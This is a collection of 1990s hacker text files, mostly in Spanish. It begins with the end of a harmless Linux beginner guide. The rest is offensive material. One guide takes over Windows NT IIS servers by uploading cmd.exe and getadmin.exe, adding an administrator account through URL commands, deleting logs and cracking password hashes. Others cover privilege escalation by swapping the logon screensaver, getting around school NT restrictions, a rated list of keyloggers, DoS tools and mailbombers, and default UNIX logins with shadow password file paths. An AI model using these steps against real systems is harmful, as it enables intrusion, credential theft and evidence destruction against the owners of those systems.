Una vez tengamos creado el fichero.tar con todos los otros en su interior, es el momento de comprimirlo, para esto, simplemente hacemos:
$ gzip fichero.tar
Con lo que ya tendremos el archivo con la extension fichero.tar.gz.
Pero ademas, disponemos de otra opción, " z " que colocariamos delante de " v " ( $ tar czvf ... ) y cuyo uso, nos hace prescindir de " gzip ", pues lo invoca automaticamente, obteniendo como resultado un archivo, de extensión fichero.tgz
3º - 5 - 2 : DESCOMPRIMIR:
La tarea de descomprimir, la llevamos a cabo, igualmente, con el comando " tar ", aunque ahora prescindimos de " gzip ", pues utilizaremos la opción " z ". Pero, en algunos sistemas, esta opción no esta incluida, y es necesario, primero usar tar y luego gzip ( esto lo he visto en sistemas SunOS, pero no en linux, asi que solo lo explico con el comando tar...). 
Simplemente hariamos:
$ tar xzvf archivo.tgz
o
$tar xzvf archivo.tar.gz
Nota: Al expandirse un fichero, se crearan los subdirectorios si al crearlo hubieran existido.
3º - 6 : COMPILANDO
Otra ventaja ( ¿mas todavia?) de Linux con respecto a sistemas como Windows, es que en Linux, la mayoria del software es de distribución gratuita ( GNU ), y suele venir acompañado de las fuentes ( esto es, el codigo en lenguaje de programación ), permitiendo a los usuarios con conocimientos de programación, la modificación de los programas...
Para que las fuentes, se conviertan en código, es necesario compilarlas, para ello, existente compiladores, el más utilizado en linux es "gcc".
Para compilar un aplicación o un fichero, por ejemplo jizz.c, simplemte hariamos:
$ gcc jizz.c
Ahora bien, si lo que se quiere es compilar un aplicación con muchos ficheros..., lo normal es hacer
$ ./configure
en el directorio donde esten las fuentes, con lo que se creara un fichero Makefile, y despues ejecutar en el mismo directorio la orden:
$ make
De todas formas, es aconsejable leer la documentación que suele acompañar a las aplicaciones, pues en ella probablemente vengan instrucciones para compilar con exito la aplicación.
4 - CONFIGURANDO EL SERVIDOR GRAFICO
Jejeje, que se creen los usuarios de Windows, ¿que nosotros no tenemos ventanitas?, juajuajuajua
Bromas aparte, ahora vamos a aprender a instalar y configurar el servidor grafico XFREE86 en nuestro sistema, suele venir con todas las distribuciones de Linux, pero si no viene, o simplemente queremos la ultima versión ( en el momento en que escribo esto, la última versión es la 3.3.3, que por ya trae soporte para aceleradoras gráficas de la calidad y modernidad de Riva TNT ... ) podemos ir a http://xfree86.org ,donde nos haremos con la última versión.
Ni que decir tiene que todo lo siguiente hay que hacerlo como root...
4º - 1 : INSTALACION
Lo primero antes de hacer nada, es buscar ( o bien en la WEB anterior, o en el CD-ROM) el programa preinst.sh y correrlo, para ello, hacemos:
# sh preinst.sh
o
# chmod 777 preinst.sh
# ./preinst.sh
Es programa quitara cosillas que pudieran estorbar y nos dira que Xfree debemos instalar ( glib , lib5 ...) cosa MUY importante, pues si no ponemos el adecuado, nuestro trabajo habra sido a lo bobo.
Una vez hecho esto, procedemos a la instalación de las Xfree adecuadas, segun nos haya dicho preinst.sh , para hacerlo, nos situamos en /usr y creamos un directorio llamado X11R6:
# cd /usr
# mkdir X11R6
Ahora copiamos los paquetes que queramos instalar al nuevo directorio ( en el servidor y en el cd-rom, vendra un descripción de los paquetes, de todas formas leer el APENDICE A ) y el paquete adecuado para nuestra tarjeta gráfica... en el ejemplo instalaremos el que se refiere a las SVGA en general y le llama XSVGA.tgz en las X 3.3.3.
Una vez esten todos en /usr/X11R6 , procedemos a descomprimirlos:
# tar xzvf pakete.tgz
Esto resultara algo tedioso y tal ... bueno, cuando este todo descomprimido, una buena idea, seria para los paquetes a disquetes si no los tenemos en cd-rom, y borrarlos de /usr/X11R6 , si dispones de muchos MB , y te hace ilusión, puedes dejarlos allí.
Vuelve a /usr y crea un enlace:
# ln -s X11R6 X11
Ahora es el momento de buscar y correr el programa postinst.sh que actualizara algunos enlaces y nos dara error si no hicimos caso a preinst.sh en lo que a librerias se refiere. Si todo ha ido bien, postinst no dara ningun error y sera el momento de pasar al segundo paso, la configuración de xFREE.
4º - 2 : CONFIGURACION:
La configuración es algo que podemos hacer de 3 maneras, a traves de un programa en modo texto, a traves de un programa gráfico y ediando el archivo XF86Config a mano.
El segundo y tercer método, no seran explicados, pues la configuración a traves del programa gráfico es muy simple ( simplemente correr ./XF86Setup y por el contrario, la edición manual es realmente complicada para nuestro nivel actual ( ademas es un coñazo ).
Lo primero de todo es hacernos con toda la información que podamos sobre nuestra tarjeta y nuestro monitor ( frecuencias de refresco, chipset, Ramdac ... ) a traves del manual, si no disponemos de manual o de ganas de mirarlo, podemos utilizar el programa SuperProve que nos dira los datos de la tarjeta ( del monitor no evidentemente ), pero este programa, podria no conocer nuestro dispositivo... en fin... el caso es que sepas lo que tienes antes de empezar a configurar.
Una vez que los sepas, corre:
# xf86config
Se iniciara el programa, las primeras preguntas, se referiran a nuestro mouse, despues pasaremos al teclado, luego le toca al monitor y pos ultimo a la tarjeta gráfica.
Un detalle importante, si nuestra tarjeta no aparece en la lista, y estamos seguros de que es una SVGA, elegir de momento el servidor VGA16, y luego ir haciendo pruebas con SVGA... 
Si despues de introducir el número de nuestra tarjeta, al darno la descriptción, el programa nos dice " DO NOT PROBE CLOCKCHIPS", quiere decir, que cuando despues, el programa nos pregunte si queremos correr X en modo PROBE ONLY, tenemos que decir NO.
Una vez que hayamos acabado de configurar todo, es el momento de ejecutar las X , para ello, mejor que pasemos a un usuario normal... y las ejecutemos como tal.
# su usuario
$ startx
Asi las X se arrancaran en el modo que hayamos definido por defecto ( 8 bits 400x600 ...), para cambiar esto, podemos hacer:
$ startx -- -bpp 32
Donde 32 puede ser cambiado por 16, 24 ...
5 - DIRECCIONES DE INTERES
Bueno, en estos momentos, ya estamos capacitados para hacer nuestros pinitos en Linux, pero también es un buen momento para recopilar información mas avanzada sobre este sistema, con este fin, se incluyen todos los enlaces siguientes:
 
http://www.redhat.com 
Distribución Linux Red Hat
http://www.cdrom.com 
Distribución Linux Slackware.
http://www.debian.org 
Distribución Debian.
http://www.suse.com 
Distribución S.u.S.E
http://www.caldera.com 
Distribución Caldera.
http://www.xfree86.org 
Xfree86.
http://www.afterstep.org 
Gestor de ventanas afterstep.
http://www.apache.org 
Site de este servidor WEB.
http://www.kde.org 
Gestor de escritorio KDE.
http://www.infor.es/LuCAS 
Documentación linux en CASTELLANO.
http://linux.apostols.org 
Magnifica página sobre Linux.
http://linux.box.sk 
Gran cantidad de información y software.
http://www.seifried.org 
Seguridad en Linux Red Hat
http://come.to/linux 
Mucha información.
http://www.linux.org 
Enlaces a todo lo que necesites.
http://www.sololinux.com 
Noticias sobre Linux... nuevas versiones, entrevistas...
APENDICE C: NOTAS FINALES
Este documento, es totalmente gratuito y de libre difusión (me gustaria que me avisaran antes de subirlo a ningun sitio, no pedir permiso, pero si avisar ), por tanto, el autor no se puede hacer responsable economicamente de ninguna perdida, pero si intentara ayudar en lo que pueda si a alguien algo de esto no le funcionara o le funcionara mal...
Para contactar, solo mandarme un e-mail a la dirección de arriba, o buscarme por el IRC Hispano, en los canales #hack, #scripting , #100scripts y #hack_novatos.
Saludos ...
         äääääääääääääääää http://fly.to/borno/  ääääääääääääääääää
        ääääääääääääääääääääää 15/12/1998 ääääääääääääääääääääääääää
       äääääääääääääääääääää HACKEAR NT SERVER ääääääääääääääääääääää
      äääääääääääääääääääää ESCRITO POR ^BoRnO^ äääääääääääääääääääää
DESCRIPCION:
 El texto a continuacion explica de una forma sencilla como hackear 
servidores que usan el NT server (tambien se puede utilizar para hackear
paginas que usen este sistema).
 
ELEMENTOS NECESARIOS:
 Conexion a Internet, NT Server en tu casa (para tener herramientas 
especiales), programa FTP (recomiendo el CuteFTP) GetAdmin, L0phtCrack, 
un bouncer o un spoofeador y un poco de picardia.

INSTRUCCIONES:
 Lo primero que tienes que hacer es fijate un blanco (si es tu primera vez
que sea un servicio cutre por si la cagas). Bueno si no tienes un blanco
puedes hacer una busqueda: busca paginas que tengan extension *.asp o 
busca en un buscador de Internet (el mejor para buscar esto es el Excite:
http://www.excite.com) por "batch file as CGI", y tendras una lista de mas 
de 700 servers con IIS.
 Lo siguiente que tienes que hacer es conectarte via ftp al servidor.
Si la direccion de la pagina es http://www.compañia.es con el ftp
conectate a www.compañia.es
 Si logras conectarte es buena señal, si no es que lo tienen desactivado.
 Si logras conectarte te saldra:
 
Connected to www.compañia.es

220 gomaespuma Microsoft FTP Service (Version 3.0)

User (www.compañia.es:(none)

Este mensaje contiene una informacion extremadamente importante, que es
el Nombre NetBIOS ser servidor: GOMAESPUMA. Ahora a partir de aqui todo son
regalos y ya tienes el nombre que es utilizado para conectarte anonimamente
a su WWW, FTP y GOPHER en esta maquina. Ya tienes el nombre de cuenta por 
defecto, a no ser que el majadero del administrador la haya cambiado, pero 
no es frecuente que pase esto. Esta cuenta se llamara: IUSR_GOMAESPUMA de 
todas formas intentare buscar una lista de cuentas por defecto a ver si hay
mas.
Ahora entra como "anonymus" y le aparece:

331 Anonymous user acces allowed, send identity (e-mail name) as password

Normalmente intenta entrar como "guest" antes de "annonymous", aunque 
algunas versiones del NT lo tienen desactivado, aunque se puede activar, 
muchas veces los administradores ponen de password "guest" o no ponen
ni siquiera, muchas veces tienes acceso a casi todo con esta cuenta, por 
no decir la mayoria. Bueno...ahora aprieta enter cuando te salga el
mensaje de bienvenida. Lo proximo que deberas hacer es mirar si el
permiso de escritura esta activado o desactivado (si puedes mandar o editar
archivos). Ahora que sabes que tienes el permiso activado (si no sigue 
leyendo a ver si hay suerte) checkea los direcctorios que tiene (si 
tiene uno que se llama CGI-BIN pega un brinco de alegria). En el direcctorio 
"CGI-BIN" esta la pagina web para que el administrador la pueda editar 
remotamente, en este directorio existe permiso de ejecutar programas,
que se pueden ejecutar mediante el navegador.Cambia a modo binario
y escribe "put cmd.exe"o lo que es lo mismo: mandas este archivo
a ese directorio. Te sale este mensaje:

200 PORT command successful.
 
150 Opening BINARY mode data connection for CMD.EXE. 

226 Transfer complete. 

208144 bytes sent in 0.06 seconds (3469.07 Kbytes/sec)

 Manda tambien el getadmid.exe y la libreria gasys.dll (ambos estan en mi 
pagina--> http://fly.to/borno/). Ahora viene la parte chunga, y es cuando de
verdad necesitaras tus conocimientos sobre el spoofing; pillate un spoofeador
o un bouncer y oculta tu ip (funciona mejor que utilizar una cuenta de
Internet mangada). Lo proximo que deberas hacer es abrir el navegador de
Internet y escribir la siguiente direccion:

http://www.compañia.es/cgi-bin/getadmin.exe?IUSR_GOMAESPUMA

Si lo has hecho bien ahora te aparecera un mensaje de "CGI ERROR" que dira
lo siguiente: "The specified CGI application misbehaved by not returning a
complete set of HTTP headers. The headers it did return are:
Congratulations , now account IUSR_GOMAESPUMA have administrator rights!" que 
quiere decir, la aplicacion no ha devuelto una respuesta valida de las 
cabeceras del documento HTTP....nada un rollo, pero lo bueno esque esa
cuenta llamada IUSR_GOMAESPUMA ¡¡ya tiene las opciones de administrador!!

 Aqui no acaba todo, pero ya tienes lo mas dificil hecho, lo siguiente es
crearte una cuenta en ese servidor para su uso propio, para crearla escribe
en el navegador esta direccion:

http://www.compañia.es/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%
20user%20crepusculo%20miembro%20/add 

 Esto ha servido para crear una cuenta con nobre de usuario "crepusculo"
y como contraseña "miembro", ahora como ya hicieste antes le tienes que 
dar los privilegios de administrador, es facil, solo aplica el cuento otra 
vez, pero esta vez cambia un poco:

http://www.compañia.es/cgi-bin/getadmin.exe?crepusculo

 Si has llegado hasta este punto esque eres un tio que tiene las ideas
claras y no quiere echarse atras. Para lo siguiente necesitaras tener 
metido el NT Server:

-Dale a buscar pc, y busca el pc: www.compañia.es
-Haz click en explorar pc (se abrira el NT EXplore), entonces te pedira
una contraseña y un nombre de usuario, ¿Cual deberas poner, lechon?
R: crepusculo:miembro
-Ahora tienes el control total del PC
-Siguiente, con el NT Explorer ve a la direccion oculta del pc:
 Winnt\system32\logfiles  y borra los logs que hagan referencia ati, si 
tienes algun problema del tipo "sharing violations" escribe en el navegador
de internet esta direccion:

http://www.compañia.es/cgi-bin/cmd.exe?/c%20date%2002/02/98

**Dale a guardar despues de editar el log**

 Usando el editor de registro conectate al registro del supuesto ordenador, 
entonces abre el L0phtcrack y en la opcion de "dump" (vaciar) los pasas
al L0phtcrack (esta en mi pagina, seria recomendable leerse las instrucciones
del mismo antes de usarlo). Ahora borra tu huella...sin el Xampa, ni don 
Limpio ni chorradas...a manini...pos como??pues borrando el cmd.exe ,
el getadmin.exe y el gasys.dll de su ordenador...."el algodon no engaña".
 Ahora con el Event Viewer (/WinNT/eventvwr.exe) borra todo lo referente
a ti. Ahora que ya no necesitas la cuenta IUSR_GOMAESPUMA quitale las
opciones de administrador, pon la prioridad del L0phtcrack en alta y 
esperate unas 24 horas a que el L0phtcrack desencripte todas las 
contraseñas. La proxima vez que entres entra con la del administrador real 
y borra la cuenta creada ("crepusculo), para que no noten nada raro y ya
tienes todo.

CONSEJOS Y PRECAUCIONES:
 Intenta hacer todo esto de noche para que no haya lugar a que el administrador 
este conectado. Tambien si utilizas este truco alguna vez dame un toquecito
diciendome que has hecho, y si quieres la pass del administrador. Por 
cierto, no se si esto funcionara en todas las versiones del NT, asi que
si no te funciona no me des la brasa en el IRC o con mails diciendome que 
te ayude, porque todo lo necesario esta aqui escrito.
--------------------------------------------------------------------------------
(C) ^BoRnO^ 1998 -Por cierto saludos a "El CrEpUsCuLo"-  


         äääääääääääääääää http://fly.to/borno/  ääääääääääääääääää
        ääääääääääääääääääääää 16/12/1998 ääääääääääääääääääääääääää
       äääääääääääääääääää CONSEGUIR ADMIN EN NT ääääääääääääääääääää
      äääääääääääääääääääää ESCRITO POR ^BoRnO^ ääääääääääääääääääääää
     ääääääääääääääääääääääääääääääääääääääääääääääääääääääääääääääääää
    ääääääääääääääääääääääääääääääääääääääääääääääääääääääääääääääääääää
     ääääääääääääääääääääääääääääääääääääääääääääääääääääääääääääääääää
      ääääääääääääääääääääääääääääääääääääääääääääääääääääääääääääääää
                äääääääääääääääääääääääääääääääääääääääääää
                 äääääääääääääääääääääääääääääääääääääääää
                  äääääääääääääääääääääääääääääääääääääää

DESCRIPCION:
 Conseguir privilegios de Administrador en el Windows nt de forma sencilla.

REQUISITOS:
 Tener una cuenta con acceso de escritura al direcctorio:
\winNT\system32

PASOS:
-Renombra el archivo "logon.scr" a "logon.old"
-Renombra "usrmgr.exe" (En workstation "musrmgr.exe") a "logon.scr"
-Dale a "Cerrar todos los programas y reiniciar como usuario distinto"
-Espera un rato a que se ejecute el "logon.scr"
-Se te abrira el Administrador de usuarios, lo unico que debes hacer es
agregarte a lo de administradores (agrega a un par de usuarios mas para que
no cante mucho)
-Sal de alli apretando clr+alt+supr    

  


         äääääääääääääääää http://fly.to/borno/  ääääääääääääääääää
        ääääääääääääääääääääää 10/12/1998 ääääääääääääääääääääääääää
       äääääääääääääääääääää HACKEAR EL NT ääääääääääääääääääääääääää
      ääääääääääääääääääää ESCRITO POR ^BoRnO^ äääääääääääääääääääääää 

DESCRIPCION:
 Descripcion de como hackear el windows NT. 

TRUCO:
 Esto es un hack off-line, por lo que necesitas acceso fisico al ordenador. 
Este hack puede ser usado en el colegio, en la universidad, etc.......
 Empezemos....estoy seguro de que sabes de windows NT (Primero vamos a mirar
un poco sobre la seguridad de este SO. En el NT no puedes entrar al DOS antes de 
poner tu nombre de usuario y contraseña, cosa que no pasa en el 95/98)
 Si te encuentras en el colegio o en la universidad lo mas probable es que 
tengas una cuenta con bajo nivel de privilegios. Si no tienes una puedes entrar 
como un "Guest" o visitante (los guests no pueden usar links, el menu de inicio,
y no pueden ejecutar programas, pero todo esto esta a la decision del 
administrador). Si es bobo podras hacer lo que te plazca, pero que hay si es un 
capullo listo....
 Bueno...si esto es asi, no puedes ejecutar programas, no puedes usar links, 
menu de inicio...MALDITA SEA! bueno no te agobies, siempre hay alguna forma de 
saltarse la seguridad. Entonces ve al menu de inicio y dale a lo de "ejecutar"
y escribe esto "c:\dos\command.com" (sin comillas), ¡DE PM! ahora puedes usar 
el DOS o puedes ir a "c:\winNt" y ejecutar el "explorer.exe". Ahora tienes
completo acceso al disco duro. Haz lo que te plazca...pero no te sobres!
 Ha sido facil, pero algunas veces no tienes cuenta y el administrador tiene
desactivado el entrar cvomo "guest". En situaciones como esta es muy dificil, 
casi imposible hacer algo. Como ya dije en el NT no se puede ir al DOS antes 
de entrar con una contraseña valida. Esto no es del todo verdad, lo unico que 
necesitas es el disco de instalacion del DOS (para principiantes: eso es lo
que necesitas para instalar el ms-dos). Bueno... inserta el disco y reinicia 
el ordenador... en unos segundos te saldra una pantalla que dira "DOS sturtup
menu". Sal del programa de instalacion del DOS, y te veras en el prompt del 
DOS, con opcion a hacer lo que quieras.  
-------------------------------------------------------------------------------
(c) ^BoRnO^ 10/12/98


----------------------------------------------------------------------------
+  Date   : 7. July 2000                                                   +
+  Title  : <*> Various Functional Hacking Tools for windows <*> v.1a       +
+  Author : The MEDiOCRE                                                    +
-----------------------------------------------------------------------------

               written by the MEDiOCRE
         themediocre@specialoperations.com
               http://techdocs.cjb.net

*Table of Contents
*Introduction
*Points
*Tools
*Links
*Disclaimer

$--------------------------------------------------------$

*Introduction
Here I will present a list of various functional hacking
tools available on the internet. Programs I or people I 
know have used with or without success. Be careful and
Enjoy!

$--------------------------------------------------------$

*Points
All the programs will be given different points accorting 
to their functionality. 
For Exempel:
[-----]  => [0 points]  => [Useless]
[*----]  => [1 points]  => [Not so Good]
[**---]  => [2 points]  => [Functional]
[***--]  => [3 points]  => [Good]
[****-]  => [4 points]  => [Very Good]
[*****]  => [5 points]  => [Outstanding]

$--------------------------------------------------------$

*Tools
Here they are, all the programs you need to have and which 
need to avoid. Again, be careful and Enjoy!


Name: 7th Sphere Portscan
By: 7th Sphere
Genre: Portscannner
Points: *****
Comments: A very fast and small portscanner.

---

Name: Keylog! 2.5
By: Mike Ellis (Original Version), KiD ViD (Enhancement)
Genre: Keylogger
Points: ****-
Comments: Logs every keystroke to a textfile.

---

Name: INT09
By: 9x
Genre: Keylogger
Points: ***--
Comments: Logs every keystroke to a textfile.

---

Name: Cyberkit
By: Luc Neijens
Genre: Nettool (many functions in One)
Points: ****-
Comments: A nettool with many functions, finger, NSlookup, traceroute
and etc.

---

Name: Sam Spade
By: Blighty Design
Genre: Nettool (many functions in One)
Points: ***** 
Comments: A nettool with many functions, finger, NSlookup, traceroute,
whois, rwhois, SMTP check and etc.

---

Name: Hackers Utility
By: DirectX & ATAPI
Genre: Hacking, Nettool, All in One
Points: *****
Comments: Many functions, finger, portscan, pwd cracker, serial
numbers, zipcracker, IP <==> host and etc.

--- 

Name: AutoHacker
By: Grimalkin
Genre: All in One
Points: **--- 
Comments: A very old All-in-One hacking tool.

---

Name: All in One 5.0b
By: Peter King (Ficticious Technologies)
Genre: All in One
Points: *---- 
Comments: A very old All-in-One hacking tool.

---

Name: Invisible KeyLogger Stealth
By: Amecisco
Genre: Keylogger
Points: ***--
Comments: Logs every keystroke to a textfile.

---

Name: Scottish Broad Sword
By: The Grenadier
Genre: DOS (denial of service)
Points: ?
Comments: Denial of Service tool.

---

Name: PGP (pretty good privacy)
By: ?
Genre: Encryption
Points: *****
Comments: The best enxcryption you can get, not even the
NSA can crack it. 

---

Name: Cracker Jack
By: Jackal
Genre: Password Cracker
Points: *****
Comments: UNIX password cracker, the BEST cracker.
Works both with dicts and bruteforce.

---

Name: John the Ripper
By: ?
Genre: Password Cracker
Points: *****
Comments: UNIX password cracker, one of the best crackers.
Works both with dicts and bruteforce.

---

Name: WinGenocide
By: ?
Genre: DOS (denial of service)
Points: ?
Comments: Denial of Service tool.

---

Name: FZC (dos version)
By: Fernando Papa Budzyn
Genre: Winzip Password Cracker
Points: ****-
Comments: Cracks winzip passwords, both with dicts
and with bruteforce. 

---

Name: FZC (windows version) 
By: Fernando Papa Budzyn
Genre: Winzip Password Cracker
Points: ****-
Comments: Cracks winzip passwords, both with dicts
and with bruteforce. 

---

Name: Death n' Destruction 
By: Black Sol (Wiltered Fire)
Genre: (denial of service)
Points: ?
Comments: Denial of Service tool.

---

Name: Fake Identity Creator
By: Crax
Genre: Anonymity
Points: *----
Comments: It fills out the registration forms at hotmail & etc.

----

Name: Anonmail
By: Jim Sensel (SoftSense Consulting)
Genre: Fake Email
Points: ***--
Comments: Send an anonymous email.
It's much funnier to do it manually.

---

Name: Catcall
By: The Marauder (Legion of Doom!)
Genre: Wardialer
Points: ****-
Comments: Dial a person, again and again and again...

---

Name: wwwHACK
By: ?
Genre: Nettool
Points: ***--
Comments: Password cracker for HTTP basic authentication.

---

Name: Kill CMOS
By: ? 
Genre: BIOS tools
Points: ****-
Comments: Reset's the CMOS.
This could be done manually, but why bother...

---

Name: Bios 1.34.0
By: Matthias Bockelkamp
Genre: BIOS tool
Points: ****-
Comments: Bios password cracker.



---

Name: CMOSpwd
By: Christophe Grenier
Genre: BIOS tool
Points: ***--
Comments: Bios password cracker.

---

Name: Legion
By: ZyklonB (Rhino9)
Genre: Portscanner
Points: ****-
Comments: Scan hosts for open shared dirs.
 
---

Name: 007 Password Recovery
By: IOPUS software
Genre: Password recovery
Points: ****-
Comments: See through the stars...

---

Name: Avalanche
By: H-Master
Genre: Mailbomber
Points: ****-
Comments: One of the best emailbombers out there.

---

Name: Up yours
By: -AcidAngel-
Genre: Mailbomber
Points: ****-
Comments: Another good emailbomber.

--- 
Name: L0pth PwlCracker
By: L0pth
Genre: Pwl cracker
Points: ****-
Comments: A good pwl cracker, Works both with dicts and 
bruteforce.

$--------------------------------------------------------$

*Links
Here are links to different internet pages were you 
can find these programs.

-www.hackers.com
-www.hack3r.com
-www.hack3rs.com
-www.hackersclub.com
-www.astalavista.com
-www.warezone.com
-http://neworder.box.sk
-http://blacksun.box.sk
-www.warez.com
-www.chaostic.com
-www.phreak.org
-www.theargon.com
-www.antionline.com
-www.anticode.com
-www.happyhacker.org
and many more...

$--------------------------------------------------------$


______   _   _   _______   _____   _____   __     _____
|  ____| | \ | | |__   __| |     | |  _  | |  \   |  _  |
| |____  |  \| |    | |    | |>  | | | | | |   \  | | | |
|  ____| |     |    | |    |    _| | |_| | | |> | | |_| |
| |____  | |\  |    | |    | |\ \  |  _  | |   /  |  _  |
|______| |_| \_|    |_|    |_| \_\ |_| |_| |__/   |_| |_|

Mas informacion en http://hg.hypermart.net
			      _      _      _      _
			|_|  /_\ |/ |_ |>  /_  |> | | \    /
			| |  | | |\ |_ |\  \_| |\ |_|  \/\/ 
(c) Copyright HaKeR GRoW. La distribucion es gratuita pero hay que dejar la URL.
Ni el autor ni el grupo de este texto se hacen kargo por lo ke hagas kon esta informacion. EL fin
de esta guia es de edukacion.

Para entrar en un sistema remoto debemos contar kon la siguiente informacion:
				 ___________
				|1 IP       |
				|2 Username |
				|3 Password |
				|___________|

La IP es un numero del tipo NNN.NNN.NNN.NNN ke recibe una komputadora al conektarse a Internet.
Si lo ke keremos hackear es una makina ke tiene paginas Web (o sea ke poniendo www.algo.com o algo
asi entremos a una pagina) podemos poner el dns directamente (dns es el dominio (www.algo.com)).

Username es el nombre de usuario de un sistema. Por ejemplo en sistemas unix hay nombres de usuarios
root, daemon y kosas asi.

Password es la contraseña del usuario (ver http://hg.hypermart.net/textos/contrasenas.txt)

----------------------------------------------------------------------------------------------------
Este proceso ke voy a explicar se denomina login y se hace, comunmente, mediante los puertos
21 y 23 (ftp y telnet respectivamente).

Si estan leyendo esto es por ke deben tener Win asi ke voy a explicarlo komo para windows 95 en
adelante.

En el ejemplo voy a usar los siguientes valores:
IP = victima.com
username = root
password = linux

*Lo ke tengamos ke escribir va a aparecer entre * y mayusculas, en el ejemplo para ke lo
entiendan mejor

FTP:

abrimos una ventana de MS-DOS

y hacemos lo siguiente:

C:\WINDOWS\> ftp *VICTIMA.COM*
conectado a victima.com

220 victima.com FTP server (Version vwu-2.4) 
ready
Usuario (victima.com:(none)): *ROOT*
Password requierd for root
Password: *LINUX*
User logged in, restrictions applyed

ftp> (y aca damos las ordenes como dir, del, cd, etc)

Asi entramos ya en victima.com y podemos subir, borrar, modificar, crear archivos en el servidor.

TELNET:

Inicio>>Ejecutar>>telnet

cuando aparece una pantalla denominada "Telnet"

vamos a "conectar"
despues a "sistema remoto ..."

escribimos victima.com (la ip ke conseguimos)
y damos "Enter"

cuando se conecta nos dira algo como:

Linux RedHat 5.0

Login: *ROOT*
Password: *LINUX*

Welcome to victima.com

>(y aca escribimos los comandos)

Espero ke esta guia les haya servido!
~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°
KERES SER UN VERDADERO HAKER Y UNIRTE AL MEJOR GRUPO DE HACKEO DE ARGENTINA????
VISITA NUESTRA PAGINA EN HTTP://HG.HYPERMART.NET

**********************************************************************
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+           									   +
+       THE ULTIMATE BEGINNER'S GUIDE TO HACKING AND PHREAKING       +
+											   +
+					   						   +
+											   +
+											   +
+					   BY     					   +
+				     REVELATION	      			   +
+					LOA--ASH					   +
+											   +
+											   +
+											   +
+											   +
+											   +
+ Written: 08/4/96						     Volume: 1 +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
F. Telenet commands
	Here is a list of some Telenet commands and their functions. This
is only a partial list.  Beginners probably won't use these commands,
but I put them here for reference anyway.
COMMAND					FUNCTION
c						Connect to a host.
stat						Shows network port.
full						Network echo.
half						Terminal echo.
telemail					Mail.(need ID and password)
mail						Mail.(need ID and password)
set						Select PAD parameters
cont						Continue.
d						Disconnect.
hangup					Hangs up.
access					Telenet account.(ID and password)

J. Basic UNIX hacking
	UNIX is probably the most commonly used operating system on Telenet, and is the easiest to hack since it doesn't record bad login attempts.  You know you've found a UNIX system when it gives you a "Login" prompt, and then a "Password" prompt. To get in you should first try the default logins.(Listed below.) If these don't work try some of the passwords listed in Section M. If these don't work try to find backdoors. These are passwords that may have been put in to allow the programmer (or someone else who could be in a position to make a backdoor) to get access into the system. These are usually not known about by anyone but the individual who made it. Try doing some research on the programmer and other people who helped to make the system. And, if these don't work, just try guessing them. The Login (usually the account holders name) has 1-8 characters and the Password is 6-8 characters. Both can be either letters or numbers, or a combination of the two.
	Once you get in, you should get a "$" prompt, or some other special character like it. You should only use lower case letters when hacking UNIX, this seems to be standard format. If you type "man [command]" at the prompt, it should list all of the commands for that system. Anyway, here are the default Logins and Passwords:
Login:				Password:
root					root
root					system
sys					sys
sys					system
daemon				daemon
uucp					uucp
tty					tty
test					test
unix					unix
unix					test
bin					bin
adm					adm
adm					admin
admin					adm
admin					admin
sysman				sysman
sysman				sys
sysman				system
sysadmin				sysadmin
sysadmin				sys
sysadmin				system
sysadmin				admin
sysadmin				adm
who					who
learn					learn
uuhost				uuhost
guest					guest
host					host
nuucp					nuucp
rje					rje
games					games
games					player
sysop					sysop
root					sysop
demo					demo
	Once you are in, the first thing that you need to do is save the password file to your hard drive or to a disk. The password file contains the Logins and Passwords. The passwords are encoded. To get the UNIX password file, depending on what type of UNIX you are in, you can type one of the following things:
/etc/passwd
or
cat /etc/passwd  
	The first one is the standard command, but there are other commands as well, like the second one. Once you get the password file, it should look like this:
john:234abc56:9999:13:John Johnson:/home/dir/john:/bin/john
		Broken down, this is what the above password file states:
Username: john
Encrypted Password: 234abc56
User Number: 9999
Group Number: 13
Other Information: John Johnson
Home Directory: /home/dir/john
Shell: /bin/john
	If the password file does not show up under one of the above two commands, then it is probably shadowed.
	The following definition of password shadowing was taken from the alt.2600 hack faq:
	"Password shadowing is a security system where the encrypted password field is replaced with a special token and the encrypted password is stored in a seperate file which is not readable by normal system users."
	If the password file is shadowed, you can find it in one of the following places, depending on the type of UNIX you are using:
UNIX System Type:		Path:						Token:
AIX 3				/etc/security/passwd			   ! 
or				/tcb/auth/files/<first letter of	   #	
				username>/<username>
A/UX 3.Os			/tcb/files/auth/*
BSD4.3-Reno			/etc/master.passwd			   *
ConvexOS 10			/etc/shadpw					   *
Convex0S 11			/etc/shadow					   *
DG/UX				/etc/tcb/aa/user				   *
EP/IX				/etc/shadow					   x
HP-UX				/.secure/etc/passwd			   *
IRIX 5			/etc/shadow					   x
Linux 1.1			/etc/shadow					   *
OSF/1				/etc/passwd[.dir|.pag]			   *
SCO UNIX #.2.x		/tcb/auth/files/<first letter of	   *
				username>/<username>
SunOS 4.1+c2		/etc/security/passwd.adjunct		   ##
SunOS 5.0			/etc/shadow					   
System V 4.0		/etc/shadow					   x
System V 4.2		/etc/security/* database		   
Ultrix 4			/etc/auth[.dir|.pag]			   *
UNICOS		 	/etc/udb					   *
	Some passwords can only be used for a certain amount of time without having to be changed, this is called password aging. In the password file example below, the "C.a4" is the password aging data:
bob:123456,C.a4:6348:45:Bob Wilson:/home/dir/bob:/bin/bob
	The characters in the password aging data stand for the following:
1. Maximum number of weeks a password can be used without changing.
2. Minimum number of weeks a password must be used before being changed.
3&4. Last time password was changed, in number of weeks since 1970.
	The password aging data can be decoded using the chart below:
Character:			Number:
.				0
/				1
0				2
1				3
2				4
3				5
4				6
5				7
6				8
7				9
8				10
9				11
A				12
B				13
C				14
D				15	
E				16
F				17
G				18
H				19	
I				20
J				21
K				22
L				23
M				24
N				25
O				26
P				27
Q				28
R				29
S				30
T				31
U				32
V				33
W				34
X				35
Y				36
Z				37
a				38
b				39
c				40
d				41
e				42
f				43
g				44
h				45
i				46
j				47
k				48
l				49
m				50
n				51
o				52
p				53
q				54
r				55
s				56
t				57
u				58
v				59
w				60
x				61
y				62
z				63
	Now, explore the system freely, be careful, and have fun!
K. Basic VAX/VMS hacking
